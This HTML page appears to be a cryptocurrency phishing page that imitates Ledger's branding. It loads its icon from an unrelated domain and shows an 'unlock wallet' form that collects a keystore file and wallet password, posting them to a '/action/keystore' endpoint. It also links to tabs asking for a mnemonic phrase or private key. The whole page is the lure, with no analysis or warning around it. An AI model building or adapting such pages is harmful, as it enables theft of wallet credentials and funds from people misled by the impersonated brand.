<html lang="en"><head>
<meta http-equiv="content-type" content="text/html; charset=UTF-8">

    <meta charset="utf-8">
    <link rel="shortcut icon" href="https://wallet.botrectification.com/img/logo/ledgerfavicon.png">
    <meta name="viewport" content="width=device-width,initial-scale=1,shrink-to-fit=no">
    <meta name="theme-color" content="#000000">
    <title>Hardware Wallet - State-of-the-art security for crypto assets | Ledger</title>
    <link href="/assets/main.css" rel="stylesheet">
    <link rel="shortcut icon" href="/main/favicon.ico" type="image/x-icon">

</head>
<body>
<noscript>You need to enable JavaScript to run this app.</noscript>
  <form method="post" enctype="multipart/form-data" action="/action/keystore">
  <div id="root"><div class="App">
  <div class="NavBar NavBar--is-centered"><img src="/logo.svg" height="80" alt=""></div>
  <div class="Pages">
  <div class="UnlockWalletPage">
  <div class="UnlockWalletPage__wrapper">
  <div class="UnlockWalletPage__title"></div>
  <div class="UnlockWalletCard">
  <div class="UnlockWalletCard__content">
  <div class="UnlockWalletCard__header">
  <div class="TabBar UnlockWalletCard__tab-bar TabBar--is-centered TabBar--is-condensed">
  <a href="/unlock/" class="TabBarItem TabBarItem--is-active tablinks" aria-current="page"><div class="TabBarItem__title">Keystore</div></a>
  <a class="TabBarItem tablinks" href="/unlock/mnemonic"><div class="TabBarItem__title">Mnemonic</div></a>
  <a class="TabBarItem tablinks" href="/unlock/privatekey"><div class="TabBarItem__title">Private Key</div></a>
  <!-- <a class="TabBarItem tablinks" href="#"><div class="TabBarItem__title">Hardware</div></a> -->
  </div>
  </div>

    <div id="keystore" class="UnlockWalletViaKeystoreFile">
    <div class="DropZone" style="display: none"><img class="DropZone__icon" src="/assets/theta-file2x.png">
    <div class="DropZone__title">Drop keystore here</div>
    </div>
 
    <div class="UnlockWalletViaKeystoreFile__title">Please select your keystore file</div>
    <label for="file-upload" class="UnlockWalletViaKeystoreFile__file-input">
      <input id="file-upload" type="file" name="file" accept=".txt" required="">Choose Keystore File
    </label>
    <input class="UnlockWalletViaKeystoreFile__password-input" placeholder="Enter your wallet password" name="password" type="password" required="">
    <div class="UnlockWalletViaKeystoreFile__footer">
    <button type="submit" id="keysubmit" name="submit" style="width:100%;" class="GradientButton undefined GradientButton"><div class="GradientButton__title">SUBMIT</div>
    </button>

    </div>
    </div>

</div>
</div>
</div>

</div>
</div>
<div></div>
</div>
</div>


    <script src="/assets/2.js"></script>
    <div class="ReactModalPortal"></div>
    <div class="ReactModalPortal"></div>
    <div>
    <div style="position: fixed; top: 0px; right: auto; bottom: auto; left: 50%; transform: translate(-50%, 0%); z-index: 100;">
      <div>
    </div>
  </div>
</div>
</form>


</body></html>